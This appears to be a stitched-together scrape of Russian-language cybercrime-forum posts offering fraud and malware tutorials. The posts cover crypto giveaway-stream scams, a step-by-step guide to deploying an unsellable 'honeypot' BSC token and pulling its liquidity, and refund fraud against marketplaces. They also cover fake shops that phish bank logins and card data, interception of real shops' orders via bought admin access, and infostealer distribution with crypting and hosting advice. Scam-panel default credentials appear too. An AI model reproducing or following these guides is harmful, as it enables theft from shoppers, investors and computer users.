Да, напоследок хочу сказать, что Бонга не единственный сайт для подобного рода скама, тем более сейчас, там многих папиков стали реально раздражать обычные спамеры по чатам со своими рекламно-зазывальными приглашениями в Whatsapp на пронпати, так что имейте это ввиду, что здесь, как и в любом бизнесе, есть, так сказать, в некотором роде конкурентная борьба. Поэтому подходящую площадку вебкам услуг сугубо под свои интересы вы можете подобрать на сайте - topcamslist.com, самые же трастовые площадки стоит отдельно выделить это: CAMS.COM, CHATURBATE, LIVEJASMIN, MYFREECAMS, STRIPCHAT, BONGACAMS, CAMSODA, STREAMATE, CAM4, IMLIVE, FLIRT4FREE, RUNETKI, SLUTROULETTE, XLOVECAM, CAMSTER, XCAMS, XVR CHAT, XHAMSTERLIVE, NUDELIVE, CAMFINDER, FAPCAM.CLUB, CHATRULETKAZ.
Че делать!?
Еще совсем недавно, была мода тна кошельки, при отправке денег на которые,
возвращается гораздо большая сумма. При отсылании 1 рубля возвращалось 3. При
отправке 3 - возвращалось 9. Ну а при отправке всех 100 баксов ничего
естественно не возвращалось. Щас мода другая, причем более интересное.
Что первое мне пришло в голову - всегда отсылать 3 рубля - пусть возвращают.
Так вот, хочу сказать всем, что ни 1 ни 3 рублей вам никто не вернет. на это
все и расчитано. Таких проверяльщиков при эффективном СПАМе дофига. И по рублю
с каждого - уже мнго. А тут недавно проспамили мою асю вот таким текстом:
привет %first! Извините за беспокойство, но количество мошенников на просторах Интернета растет пугающими темпами, в связи с этим предлагаю следящее:
мною был изобретен способ обмана "лохотронных программ", моей целью является его распространение.
Если Вы заинтересовались, зайдите на эту страничку lohotron- mustdie.narod.ru. Всего доброго!Click to expand...
Ессно сайт lohotron-mustdie.narod.ru это тоже лохотрон. Только прикрывается благими целями и якобы рабочим действующим опытом. Подобных отростков мошенничества от одного и того же полно. Ясно что на обычный кошелек счастья никто не клюнет, так его можно немного модифицировать и какой нибудь 5-классник так и отправит десятку на поглощающий кошелек.
Нихао мои юные любители скама, сегодня я покажу вам как вася с деревни может заработать себе на ламборгини уже на следующие сутки.
Стал замечать что на просторах ютаба, все больше и больше начали всплывать накрученные трансляции с илон маском и ему подобных, aka Виталик Бутерброд aka МикроСтретеджи и Ко.
Сначало подумал, неужели на такой лоховоз еще кто то ведется ? Я эту нишу еще нашел лет 8 назад нашел, и думал она умерла, но как глубоко я ошибался.
https://muskx2.tips - скам
Зайдя на сайт, я увидел типичную схему, отправь 1бтц получи 2 обратно и так далее. Ну думаю я такой, кто на такую фуфайку сегодня поведется, но нет... Мамонтов оказалось более чем достаточно..
Вбил я их кошельки в эксплорер и увидел
0.16btc 2.8eth за сутки, думаю неплохо, притом что ты можешь запустить трансляцию прям с дома и купить на неё накрутку. Но это еще не всё.
Пошел я дальше бороздить по ютюбу, и увидел......... еще десятки подобных сайтов/трансляции и на одном из них было за сутки собрано более 150.000$. При условии что схема мамонт, изжила себя давно, лохи до сих пор ведутся причем даже неплохо, при хорошем раскладе за 10 дней можно нафармить 1кк $ А если запускать по 10 трансляции в день то тогда можно заработать еще больше. Ужас
Я никого и ни к чему не призываю, данный материал предоставлен исключительно в ознакомительных целях
Где почитать про СИ, книги, статьи, форумы итд.
За то что я новичек, думаю нету смысла говорить.Сидел на форуме, иногда читал, наблюдал, но сейчас заинтересовался СИ и как это вообще устроено.
Зарание спасибо за оветы<3
Хочу предложить помощь форумчанам и новым пользователям кто решил
окунуться в фиш.
В рамках оного окажу начинающим консультации по фишингу и добыче сс (2д и
3д) От А до Л. Проведу ликбез по теме, отвечу на все вопросы. А именно:
- постановка задачи
- поиск оффера
- создание связки
- технические аспекты
- нюансы хорошего фишинг проекта(сайта)
- поиск и добыча стабильного трафика
ВНИМАНИЕ!
**Ничего не продаю, не покупаю, не советую мутных левых селлеров
Не даю информации по вбиву и прочей отработке полученного материала
Прошу уважаемую администрацию не считать это коммерческим топиком.**
Уже около 2х месяцев пытаюсь найти добротную информацию связанную с индустрией кардинга, большинство говорят что все мертвое, не надо лезть и тд, но я очень сильно горю этим, считаю, что это ступень для моего будущего, поможет, так скажем, подзаработать денег и двигатся в сфере крипты или IT. Опытные люди, которые читают форум, подскажите стоит ли и хватит ли мне 250-400$, чтобы начать зарабатывать? У меня уже был небольшой опыт, но как оказалось покупал плохой материал и прокси. Буду благодарен за ценную информацию. Обучение покупать не собираюсь, считаю что это шлак и вся информация есть в интернете. ПРИВЕТ WWH!
Нейролингвистическое
программирование
- это труъ.
В тему СИ, готов ответить на любые вопросы в рамках этой темы :diablo:
В то же время, ищу тут увлекающихся этим направлением людей
Установка:
Админ панель по пути site.com/admin
Пароль от админки: xss
Панель спамеров по пути site.com/lightadmin/
встроенный аккаунт спамера: sppaam:1
Spoiler: скрины
Spoiler: Главная страница
Spoiler: Админ панель(главная)
Spoiler: Панель спамера
Hidden content for authorized users.
:СКАЧАТЬ:
xss.is
Правила раздела "СИ/Фишинг/Мошенничество"
Данный раздел создан в первую очередь для конструктивного, нагруженного смыслом обсуждения вопросов связанных с такими темами как "Социальная Инженерия ", "Фишинг " и "Мошенничество ", к которому относятся и все обсуждения связанные с "Кардингом " и его ответвлениями.
Поддерживается и всячески приветствуется обсуждения и осмысленные посты с законченной мыслью на такие темы, как:
В это разделе НЕЛЬЗЯ размешать коммерческие темы, для них есть специальный
раздел.
При возникновении вопросов - Вы всегда может обратиться ко мне в личные
сообщения
В этом разделе строго запрещаться :
Также все участник должны выполнять общие правила
форума.
Правила будут меняться и дополнятся по мере необходимости.
Отпишите какие есть варинаты! Как легальные, так и полулегальные.
При этом обладая лишь повехностынми знаниями и без особых усилий.
Если имееться комп, и безлимитный инет (с невыскокй скоростью)
Правда в инете я провожу часов по 12-15 в сутки (если не больше)
Парни, всем привет. В данной статье я разберу тему рефов. Постараюсь без воды,
максимально по полкам.
Обучение рефам это на самом деле, глупая идея). Я действительно хуею, насколько эта ниша получила авторитет. Ну я имею ввиду, что фактически, это очень простая х#йня, которую может провернуть абсолютно каждый, без обучений. Но инфобизнес работает на все сто. ниша процветает, вкидывают обучи по 400 баксов, делают рефы за процент.
Рефы - это исключительно творческая ниша. А обучение творчеству, это довольно странно)
Click to expand...
Начнём по порядку:
Пиздеть что посылка которая тебе пришла, в хуёвом состоянии и просить
обратно свои бабки.
В рефах мне нравиться то, что там есть необходимость обладать нестандартным, хитрожопых мышлением. Фактически, в карже так же. Но чтобы дойти до уровня того, что это мышление приносило бабки, ты должен изучить работу фрода, знать нужные бины, конторы, пробив сервисы, связи и т.д.
В рефах всё как в филосифии). Мыслить может каждый, и сказать какую-то умную х#йню тоже. Просто у кого-то это получается лучше, а у кого-то хуже.
К чему это? Да к тому, что здесь хватит просто логики.
Здравая логика. Чтобы наебать магазин, желательно чтобы тебе верили больше чем продавцу. А чтобы тебе верили больше чем продавцу, тебе необходимо:
Разбор №1
Предоставить внушительные причины вернуть бабки
Click to expand...
Как предоставить внушительные причины? Ну если голова на плечах есть, можешь сам уже понять. Но другой вопрос, что для интернет магазина внушительная причина? Для меня, внушительная причина вернуть бабки, это если твоя купленная бандура вообще не работает. А для интернет магазина одной царапины хватит чтобы вернули деньги. Т.е. нужен опыт в разных интернет площадках. Чтобы понимать, кто трясется за свою репутацию. Это немного длинная история, расскажу позже.
Разбор №2
Чтобы к тебе относились лояльно
Click to expand...
Для того что показать им, что ты не наёбщик, который сделал заказ ради возвращения денег, ты должен внушить доверие к себе ̶~~п̶р̶я̶м̶ ̶к̶а̶к̶ ̶т̶ё̶л̶к̶и̶ ̶д̶е̶л̶а̶ю̶т̶.~~
Что для это нужно? Очень просто, сделать ещё несколько заказов, в которых ты не будешь открывать споры. А как посылки придут, просто пиши пиздатые отзывы. Ну заказал 2 посылки по 2 бакса, приложил фоточки к отзыву, сказал как всё охуенно и еще подписал что их интернет магазин охуенный.
Всегда примеряй себя на место интернет-магазина.
Если приходит х#й который создал акк месяц назад и просит бабки назад, ты бы точно ему поверил?
А если этот х#й создал аккаунт 3 месяца назад, делал несколько заказов, оставлял положительные отзывы, и ещё добавлял какой у них пиздатый магаз, ты бы проявил к нему больше лояльности во время спора? Ответ очевиден.
Разбор №3
Чтобы к продавцу относились менее лояльно
Click to expand...
Сразу скажу, что я буду обучать рефать товары с интернет-площадок. Забудьте нахуй про интернет магазины, которые продают товары сами. Действуй логично. Если ты юзаешь интернет площадку, то она всего лишь посред, между тобой и продавцом. Она свои деньги не теряет. Ей глубоко похуй на то, что продаван потеряет деньги. Для неё куда важнее покупатели.Но опять же, не всегда. Мы именно поэтому смотрим продавца с хуёвым рейтингом. Потому что если продавец красава, давно на рынке, положительные отзывы, а ты такой х#й с горы, который создал акк месяц назад и требует деньги, то шанс выиграть спор в разы ниже. А интернет магазин, который продает все товары от себя, трясется за свои бабки. И если ты пойдешь рефать х#йню за 300 баксов, они эти деньги теряют, и судят спор тоже они. Поэтому пока мы не будем разбирать магазы индивидуалки. Опять же, нельзя говорить за всех. Есть несколько отличных брендовых магазинов, которые спокойно возвращают бабки.
Условно, нам нужен телефон. Первым делом смотрим рейтинг продавца. Зачем смотреть рейтинг? Я писал выше! Желательно чтобы рейтинг был 4 звезды и ниже. Но куда важнее, чтобы магазин был новый. Есть большая разница между магазином с 4 звездами, 3 годами продаж и сотней отзывов. И магазином с 5 звездами, 6 месяцами работы и одним десятком отзывов.
Если у нас есть магазин, в котором рейтинг 4.5, дохуя отзывов и много лет
работы, мы не лезем рефать их товарку, т.к. очень много рисков.
Если у нас магазин
которому не больше года, нету отзывов, или очень мало, то впринципе он нам
подходит.
Успешный реф - это всё в совокупности. Не охуенные знания СИ, не пиздато прогретый аккаунт под реф, а всё по чуть-чуть.
Click to expand...
Именно поэтому плохой магазин не залог успеха. Мы должны бить по всем форонтам. Мы не просто ищем плохой шоп, а еще в совокупности к этому, товар с плохим описанием, неточностями, какими-то ляпами.
Но описание товаров, хитрости продавцов, оптовые закупки под реф и многое другое, мы рассмотрим в следующей статье. Из этой статьи вы должны запомни главное:
1. Реф - это творчество
2. Заставь их проявлять к тебе лояльность
3. Ищи продавана мамонта
4. Ты будешь спокойно спать по ночам, ехехе
В этой статье я вам дам полный мануал как сделать скам токен с невозможностью продажи, но возможностью покупки токена и неофициальным листингом на Pancakeswap.Каждый из вас сможет запустить свой скам токен,взамен я прошу поддержать эту статью.Тут не будет воды, а сразу действие. Ну что? Поехали!
Перейдите на сайт https://remix.ethereum.org/ и создайте новый файл "ВашеНазвание**.SOL** "
Скопируйте и вставьте код контракта в открывшееся рабочее пространство
Смарт-контракт скам токена -Ссылка
Шаг 3: Компилятор
Переходим в 3ю вкладку
Версия контракта и версия компилятора должны совпадать!
Compiler : 0.6.6
Click to expand...
Нажимаем на голубую кнопку Compile "ИмяВашегоФайла.sol"
Если в контракте нет ошибок, то на значке компилятора появится зеленая галочка, как на скриншоте
Click to expand...
Шаг 3: Компилятор
Переходим в 3ю вкладку
Версия контракта и версия компилятора должны совпадать!
Compiler : 0.6.6
Click to expand...
Нажимаем на голубую кнопку Compile "ИмяВашегоФайла.sol"
Если в контракте нет ошибок, то на значке компилятора появится зеленая галочка, как на скриншоте
Click to expand...
Шаг 4: Запускаем токен
Переходим в 4ю вкладку
Environment: Выбираем "Injected Web3 "
Click to expand...
Account: Ваш адрес кошелька Metamask. В кошельке переключитесь на сеть Binance Smart Chain
Click to expand...
Contract : Выбираем TokenContract - ИмяВашегоФайла.sol
Click to expand...
На против кнопки Deploy нажмите на стрелку, что бы открыть меню токена
Заполните информацию токена
NAME = Имя вашего токена
Click to expand...
SYMBOL = Символ вашего токена
Click to expand...
TOTALSUPPLY = Общее количество токенов
Click to expand...
Архитектура контракта написана таким образом, что ликвидность добавляется автоматически сразу после создания токена
LIQUIDITY = Количество скам-токенов, которое отправиться в пул ликвидности. Количество не должно превышать TOTALSUPPLY
Click to expand...
VALUE = Количество BNB, которое отправится в пул ликвидности. Минимум можно добавить 0.5 BNB, в противном случае токен не сможет функционировать.
Click to expand...
В раскрывающемся окне, в место Wei выберите Finney
Click to expand...
Укажите минимум 500 Finney. 1000 Finney = 1 BNB.
Click to expand...
Нажмите кнопку **Transact
Подпишите транзакцию
Адрес смарт контракта lp-токена = адрес пула ликвидности.**
Важно: Создавая новый пул ликвидности и внося туда свои скам токены - вы являетесь единственным владельцем всех средств, которые поступят в этот пул после обменов.
Click to expand...
Готово. Токен создан!
отправленного в ликвидность.**
отправит вам LP токены (что с ними делать расскажу ниже)**
Токен будет доступен для покупки на Pancakeswap сразу после создания!
под кнопкой Deploy в разделе Deployed Contracts.**
Нажмите на иконку "Скопировать", что бы получить полный адрес контракта
Для примера покупаем 1 токен
Апрувим контракт прежде чем свапнуть, если это требуется
Click to expand...
Видим ошибку. Токен невозможно продать
Что бы вытянуть всю ликвидность обратно у вас должны быть LP токены вашего пула ликвидности. PancakeSwap автоматически отправит их на ваш кошелёк, после создания токена.
**Что такое LP токены?
LP токены -** репрезентация доли средств в пуле ликвидности.
Адрес смарт контракта lp-токена = адрес пула ликвидности.
Важно: Создавая новый пул ликвидности и внося туда свои скам токены - вы являетесь единственным владельцем всех средств, которые поступят в этот пул после обменов.
Click to expand...
Под кнопкой Deploy в разделе, где вы указывали информацию о токене, снизу
можно увидеть ваш контракт. Нажмите на стрелку и разверните меню создателя
В поле ввода укажите, какой процент от пула вы хотите вывести себе на кошелёк. Нажмите на кнопку RemoveLiquidity и **подпишите транзакцию
Средства моментально окажутся у вас на кошельке**
Всё готово
Самое время нагнать трафик и лутать профит
С вами были Crypto Forbes Russia
Привет девочки и мальчики а также их родители. Решил выгрузить небольшую часть опыта по разводкам в интернетах.
и так, я не писака и не умею формулировать мысли. но думаю кому надо тот поймет)
#1 Скамшоп
Идем на google.com/maps и выбираем страну
[рекомендация от меня]
Хуевые страны и их минуса:
Сложно вбивать на постоянном объеме: ЮСА, АЗИЯ, КАНАДА
Маленький средний чек: Африка, восточная Европа
Как выбрали страну идем на маркетплейсы и смотрим че вообще людям надо и на что дефицит.
[рекомендация от меня]
Хуевые товары это техника apple, мебель и разная мелочевка для дома
Дальше ищем сайт(ы) донор от куда вам раб будет брать товарку или дизайн. Идем на google.com включаем проксю той страны которую выбрали. Поиск по ключам Купить секс-игрушку и т.д
Выбрал ты сайт(ы) дальше покупаем домен на любом антиабузе например: https://nicenic.net/ сервак или хост можно поискать тут на форуме
По своему опыту рекомендую использовать платформу ОpenСart для поднятия шопа. Выбираем шаблон например https://opencartforum.com/files/
Свое время нужно ценить, нечего боярам заниматься работой для челяди по этому используем фрилансбиржи для старта сайта. например https://kwork.ru/categories/website-development/noviy- sayt
Выдаем бедолагам доступы к серверу, высылаем купленный шаблон ,и дальше свои пожелания по дизайну и товарке с сайтов доноров. Процесс изготовления займет 1-2 недели, смотря какая загруженность и мотивация бедолаги.
вопрос ответ
Можно создать сайт 1в1 типа фейк м-видео? да, но красная табличка от гугла
будет прилетать и таким вариантом разводок не советую использовать. Вы
получите лишние вопросы, и куча мозгоебства на всех процессах.
Сколько бумаг я потрачу на данном этапе? домен 20$ хост/сервак 20-50$ красивый шаблон 20-60$ разработка сайта 70-150$ и доп траты до 30-50$
Как только бедолага сдал Вам работу по простому и ясному тз вы начинаете смотреть че исправить, сайт не должен быть сильно сложным. Хватит таких разделов: Каталог Товаров О Компании Доставка/оплата Контакты Гарантия. Цены ставим по рынку но вешаем скидку. В зависимости от товарки. Это сложная тема со скидками, нужно ходить на краю Дать почувствовать халяву, но не вызвать подозрения. Если Вы запустились и видите что Вам написали что вы мошенник и цены маленькие то не стоит переживать, возможно дело не в ценах а лохе который не является вашим клиентом.
Сделайте максимально быстрое оформление заказа. номер телефона, почта, адрес, имя. и то почту не обезательно ставить, так-как есть страны где разные банки и организации так запугали людей что боятся оставить где либо почту.
Доставку ставьте самую популярную по том гео где делаете шоп 2 варианта и сделайте поле самовывоз с магазина, только условие надо написать в доставку что-бы оформить самовывоз ты должен оформить заказ на сайте)
Такс- по оплате тут тоже все зависит от гео, лучше всего повесить 2 -3 варианта карта, банк трансфер и чтото локальное в их регионе. Так-же при выборе банк трасфер можно сделать чтобы редирект на страницу авторизации в лк банка, и вы будите стилить БА.
что надо еще? Заказываем на фрилансбирже красивое письмо с заказом"ваш заказ оформлен" и вешаем на сайт чат тех поддержи, это все вкусовщина например jivo.ru или smartsupp.com . И регистрируем пачку менеджеров под вашу страну.
Как выглядит процесс заказа? лох оформил заказ - его перекинуло на оплату - вы кинули ему сообщение/письмо что ваш заказ оформлен ожидает оплату и ссылку на оплату - если не оплатил то идем в месенджер дожимаем.
Вот и все ваш шоп готов, но вот беда не понимаешь ты как трафик брать. тут все просто, гугл фб и тизерки если товарка ваша позволяет, например вы сделали секс-шоп и ходите продавать дилдаки идете на трафик-джанки это тизерка хаба. Я это написал что-бы вы понимали кто ваш человек и где он сидит.
Вы должны научится лить трафик сами! не пытайтесь найти форумчанина который нальет, 99% которые будут это воздух. Лучше всего лить со своих, без каржа, Так-как менее мозгоебнее и трата/профит +1000% при правильном подходе. Чистый айпи, нету клауда и прочей чепухи по типу антиддоса и ваш сайт вылазит в топ по запросам, далее начинаете получать бесплатный трафик который ничего не стоит)))
но это все паблик методы, вот начинается самое интересное.
на таких методах как указано выше есть крыша по чистому профиту, обычно это
до 10к баксов в день и 200 в месяц , готовьтесь что сайт будут ддосить, и
прочее траблы когда будет простой.
#2 Разводка И так, Идем мы на разные форумы и скупаем у барыг или делаем топик, КУПЛЮ ДОСТУПЫ К ШОПАМ, вы купили доступ и видите там базу заказов, по этой базе проспамили разводку чтото по типу "Майкал ты тут регестрировался на нашем сайте но не забрал свой бонус" этот вариант письма подойдет если вы оформили индивидуальный скамшоп НО. Вы можете перехватывать заказы, схема выглдит так, у вас есть доступ к шопу где 30 ордеров в сутки, вы начинаете кидать свои ссылки на оплату, получается вы заказываете платежку по дизайну 1в1 как в шопе и начинаете делать перехватывать заказы, по своему последнему опыту могу сказать такую стату:
100 заказов
средний чек 1.5к евро
35 оплат на сайте шопа на офф линке
27 оплат на моем линке
шоп выпалил что у меня был доступ только через 62 часа после первого моего
письма и смс мамонту.
НО! нас выкинули у нас осталась база старых заказов, мы берем эту базу и смотрим что оформлял покупатель, и сумму имя и контакты, делаем письмо такого плана от имени шопа будем слать"Майкал ты у нас покупал мясорубку, но ты не забрал кешбек в виде реальных евро на свою карту" и даже пофиг что майкал платил с палки, не имеет значения. Майкал смотрит на это письмо и думает, офигеть я за мясорубку отдал 400 евро а тут кешбек 70, европейцы очень экономные и любят такое.
С базы 1к заказов за последний месяц работы шопа, можно достать колоссальные суммы. Но есть свои минуса, это нужно поднять свою жопу с дивана и научится спамить и быстро реагировать. Так-же проблема это списывать бабос. Хорошего вбивера или мерч найти допольно сложно, по этому я решил поделится самые простые варианты куда девать бабло мамонта(ссылочки будут внизу)
Для этой схемы со спамом по базе шопа нам надо: письмо, простая информативная страница, страница вбива карты как на фото и страница 3дс супер простая 1 под все банки. или сделать на выбор получить кешбек карта/БА
Это все можно заказать на фрилансе, cтраницу вбива чистую вам напишут за пару
сотен. Страницу вбива лучше всего вешать на отдельный домен, что-бы когда гугл
дал красную табличку вы не потеряли лохов которые не успели забрать свой
кешбек с письма.
Вбиваем сразу на любую сумму, обычно на опыте уже будите понимать на каких
картах бабки есть, а на которых пусто или под привязку на пос/сервисы куда
можно всунуть applepay
Думаю на этом все, а то чет заебался писать, оформлять красиво не буду причина написана в начале предложения.
КТО ПОСТАВИТ ЛАЙК ТОМУ ПОМОГУ ЧЕМ СМОГУ!
Code:Copy to clipboard
Домены: nicenic.net
Разное для шопа: opencartforum.com/files
Хост/cервер: xss.is/forums/134/
Сюда вбиваем: aliexpress.com есть applepay
Сюда вбиваем: alibaba.com есть applepay
Cюда вбиваем: computeruniverse.net есть applepay
Сюда вбиваем сразу крипта но много нюаносов!!: kraken.com есть applepay
Сборник шопов по РУ(можно насытится идеей scam.su
В любой ситуации по покупке доступов и баз используйте гаранта, и сразу оговаривайте все условия. Что за доступ, как реализована оплата на сайте, что в базе есть и т.д
Шоп лучше заказывать у работяги с фриланса, шанс что работа будет выполнена качественно и в сроки на много выше чем "мастер на все руки" с форумов.
Пишется для новичков! Тема длинная и обширная, поэтому придется разбивать её на несколько частей. Если заинтересует, продолжу.
Хочу сразу сказать, что всё описанное ниже основано сугубо на личном и практическом опыте. Ссылок на сервисы не даю, обосрать кого-то цели тоже нет. Надеюсь, что данная информация пригодится хотя бы 1 целевому человеку из 10. Другие слишком глупые и ленивые, чтобы извлечь из этого какой-то толк.
Вообще написать этот пост меня побудила ситуация, которая происходит на рынке, в общем и целом. А на рынке процент банального наёба покупателей уже давно зашкаливает за все возможные границы. Более того, если раньше это как-то скрывали, то сейчас даже не скрывают. Происходит это, конечно, ввиду абсолютной тупости «населения» тематических форумов.
Поэтому мы с вами и разберем каждый шаг, чтобы потом вы просто тупо посылали селлеров, которые будут лить вам в уши говно и гнать пургу. Знание – сила!
Статистика упорно показывает, что самые (и единственно!) успешные люди в любой сфере – это те, кто самые умные, работоспособные и обладают секретной информацией. Остальные (около 95%) - это обычная кормовая база, для разного рода коммерческих сервисов. В нашем случае это люди, которые единственное, что умеют это втупую тыкать на клавиши, ныть, жаловаться и гадить везде, где можно и нельзя.
Если есть желание разобраться в вопросе и добиться финансово успеха, то советую прислушаться к моим советам.
Параграф ноль. Нулевая точка отсчета. Начнём с подготовки.
Прежде всего, вам понадобится:
Первое. Мат часть.
Это то, что уважаемое школие, студенты и взрослый люд ненавидят больше всего. Теория. Казалось бы, на кой черт нужна теория? «Я голый практик, фтопку теорию» с гордостью заявляют 9 из 10 человек.
Теоретическая база нужна везде. Вообще везде. От и до разбираться не нужно, но основы знать обязательно. Как минимум это относится к:
~ Минимальное понимание основ администрирования серверов
~ Понимание основных протоколов работы
~ Базовые знания html|css если работаете с лендингами.
~ Понимание основ криптографии.
~ Умение спуферить данные которые приходят/уходят в вашей работе.
Зачем это нужно? Иначе вы будете брести в полной тьме, даже не понимая, что делаете от слова совсем и вообще. Успех работы зависит для начала ОТ ПОНИМАНИЯ ДЕЙСТВИЙ, КОТОРЫЕ ВЫ ВЫПОЛНЯЕТЕ. И второе КАК ИМЕННО ЭТО ДЕЙСТВИЕ ФУНКЦИОНИРУЕТ.
О каком финансовом успехе тогда вообще может идти речь?
Второе. Сложности.
Условно представим, что путь от начала сборки вашего денежного конвеера состоит из 10 шагов. И каждый шаг имеет 3-4 подшага. Итого, есть 40 ячеек, которые должны выстрелить с шансом «успех».
Если вы не верите в Высшую Магию, но тогда понимаете, что где-то да будут проблемы. Болеее того, скорее всего они будут на каждом шаге. К этой прозе жизни надо привыкать.
Но я вам скажу так, это абсолютно нормально. Если вы боитесь сложностей и в глубине души надеетесь, что вас пронесет от всего этого зла, то лучше даже не приступайте. Любая сложность решаемая. Вообще любая, просто надо уметь искать подход. Когда научитесь – успех не заставит себя ждать.
Третье. Трудолюбие и упорство.
Тут всё просто. Если не готовы пахать в первое время по 12 часов в день и больше, успеха вам не видать. Вам просто не хватит времени всё настроить и запустить. Всё меняется, всё в движении. Данная тема не для любителей спокойных, ламинарных течений. Можете поспорить, конечно, но доказывать что-то надо себе, а не другим людям.
Параграф первый. Наглядная схема работы.
Казалось бы, занудная и бесполезная тема, одна судя по моему личному общению как минимум половина не представляет всей картины, в общем и целом! Так что поразмышляем наглядно. Итак. Представим это в виде простейшей математической формулы:
Трафик + софт = материал для работы = прибыль
Коротко говоря, мы имеем трафик, который в конечном итоге приводит к тому, что у вас будут установки вашего exe файла на компах пользователей (Install’ы). С компа пользователя вы можете получить полезный материал, который превращаете в деньги.
Теперь расширим функцию:
Теперь соединим это всё воедино:
(Канал трафика + конверсионный сайт) + настроенный софт = Логи +возможный доступ к ПК/телефону + кейлоггер (по надобности) = Активный и пассивный доход.
Конверсионный сайт состоит из собственно сайта, протестированного и заточенного на максимальную конверсию и продуманную легенду/тематику. Сюда же добавим аналитику (ТДС систему). Сюда же добавим антиклоакинг. Сюда же добавим хороший крипт. Еще сюда же добавим хостинг для сайтов и возможный хостинг для вашего софта. Об этом ниже. Наша функция распухает и становится неудобоваримой визуально. А ведь это лишь база!
Итого функция приходит к виду:
(Канал трафика + (легенда + максимально конверсионный сайт + ТДС система + антиклоакинг + крипт файла)) + настроенный софт + настроенный хостинг = Логи (+возможный доступ к ПК/телефону) + кейлоггер (по надобности) = Логи +возможный доступ к ПК/телефону + кейлоггер (по надобности) = Активный и пассивный доход.
Теперь вопрос. Много ли людей вообще об этом задумывается, как много им нужно для работы? Очень мало …
Каждый! Каждый шаг требует проработки! Каждый! Причем детальной, вдумчивой и внимательной. Если один из множителей будет равен нулю, то всё ваше умножение и будет равно нулю. Жиза, однако.
Ну и теперь добью, у кого еще остались розовые очки. Никто эту схему за вас не соберет. Так что садимся за гугл и начинаем вдумчиво изучать что и как в этом мире работает и устроено.
Параграф второй. Софт для работы.
Вначале рассмотрим собственно софт для работы. Потому что, исходя из ваших возможностей (финансовых и интеллектуальных), отталкиваться нужно именно от этого.
Для новичков (и не только) – самый оптимальный вариант – это стиллер. Такая хрень, которая прёт с компа (в общем и целом) и браузеров ( в частности) всё что плохо приколочено. Пароли, явки, фото, данные, кукисы и т.д. В общем, противная вещь для злых дядей.
Опять же, каких-то либо ссылок давать не буду. Я скажу, как выбрать лучший вариант для себя, на что обратить внимание и как не наебаться с покупкой.
Итак, стиллеров на рынке много. От известных, до не очень известных. Основная зона обитания это эксплоит и ввх. Приватных еще больше. Отмечу, что в данном случае «приватный» не означает «супер-качественный». Обычно, даже наоборот. Условно все стиллеры можно разделить на две группы:
Внимание! Далее идет сугубо личное мнение. А то сейчас налетят селлеры стиллеров и закидают меня какашками.
Давайте сразу учтём одну простую мысль. Всё что пишут, будет правдой в лучшем случае наполовину. Стоит открыть форум и вы увидите сотни тем, где прямо всё так вкусно и радужно. Вот только купи, запусти и тебе польётся денежный поток. Ни проблем, ни подводных камней, ни наёбов и подъебов. Ничего нет. Одна только концентрированная радость от работы и пухнущий кошелек от биткоинов.
Наёбывают все! Абсолютно все! Избежать этого можно, лишь понимая мат часть и зная, что именно и для чего вам нужно!
Чем хороши стиллеры, которые грубо говоря, выдаются под ключ? С одной стороны всё выглядит кошерно в стиле лакшери. За энную сумму в месяц вы получаете софт, полностью готовый для работы. Можно сказать под ключ. Криптуй и в бой! На этом плюсы заканчиваются. Рассмотрим минусы.
Прежде всего, нужно понимать, что ВСЕ ваши логи и данные будут расположены на серверах доступа к которым у вас нет. Конечно, вы прочитаете много заверений про «сервера, расположенные на Марсе/Юпитере/Луне/в недрах черной дыры» а еще «никакого логирования», а так же «кристально чистую работу с клиентами» и т.д.
Думаем логично – вы доверяете ваши деньги и безопасность стороннему сервису? Особенно в черном бизнесе. Даже так – можете ли вы доверять кому-то ваши данные тупо под честное слово? В сфере, где само слово «доверие» выглядит как- то жалко, смешно и по … заказанному что ли. Доверять можно, если можно проверить. А если проверить нельзя, то ….
Если всё-таки доверяете, то вопрос решенный. Если нет, то переходим ко второму варианту.
В данном случае все ваши данные будут на вашем сервере. Минусы опять же на виду – поковыряться с настройкой придется самостоятельно. И с установкой тоже. Да и базовую тех поддержку придется оказывать самостоятельно, если не хотите терять тонну времени. В общем-то, это даже и не минус. Для кого-то наоборот жирный плюс.
А теперь КРИТИЧЕСКИ ВАЖНОЕ замечание, на которые обычно все ложат большой и толстый хер.
Стиллер надо проверить. Проверить самостоятельно! Не доверяя никому, никаким чекерам, тестерам и т.д. Берете пачку дедов/виртуалок с информацией на диске и разных браузерах (если дед голый – набейте ее самостоятельно). От ХП до 10 винды, версии х86/х64. Отключите все антивирусы и запустите билд. Проход должен быть 100% и только так! Если где-то что-то не отрабатывает, смело пишите разработчику и выясняйте этот момент. Вас будут уверять, что вы дибил и у них всё работает. Не верьте, вы не дибил. Наоборот, вы стали умнеть и стали слишком неудобным клиентом.
P.S. Вы даже не представляете насколько убого реализовано большинство стиллеров. Потери доходят до 50% !!! И я не утрирую.
Параграф третий. Хостинг.
Самая больная тема, увы и ах. А для новичка еще и самая сложная. Поэтому разбираемся внимательно. Как бы вы не стремились к автономности и минимальной зависимости от сторонних серверов, с хостерами работать вам придётся постоянно. А эти редиски этим вовсю пользуются.
Итак, при подборе сервера надо сразу понимать, что именно вам нужно. И для
чего. И какие требования. Под стиллер вам нужен обычный VDS средней мощности.
2-4 ядра, 4-8 гигабайт RAM, 100 гб SSD вполне себе для работы.
Под внц требования на порядок выше и сложнее! Поэтому это я здесь описывать не
буду, ибо тема не для новичков уже.
А теперь список самых распространённых наёбов со стороны хостинга:
Антиреклама. Например, фастфлюкс (рассмотрим ниже) у BRAZZERS в последнее время показывает аптайм 10-20% Я не ошибся. Около 80-90% времени их фф находится в дауне! Тех поддержка проблему не признаёт и тупо игнорит или банит. Курите форумы, там всё написано.
UPTIME мерять самостоятельно! Необходимо! Обязательно!
Посчитаем: Частично не отработал стиллер, аптайм в пределах 90% (например). Вы еще даже близко не приступили к работе, а уже потеряли около 15-20% потенциальных инсталлов. Нравится картина?
Тут просто. Берете вы канал на 1Гб/сек. А у вас он ниже раза так в 2 или 3 (имеется в виду сумма входящего + исходящего потока). Тех. Поддержка клятвенно уверяет, что канал выделенный, а не shared. А у вас другая картина … Очень и часто распространено. Проверяйте. Критично если вам нужен широкий канал для работы.
Еще проще. Вам обещают 32 ГБ рам, а ставят 16. Зачем это нужно? А потому что 50% даже не проверяют. Проверяйте, перед вами мило извинятся и поставят нужное.
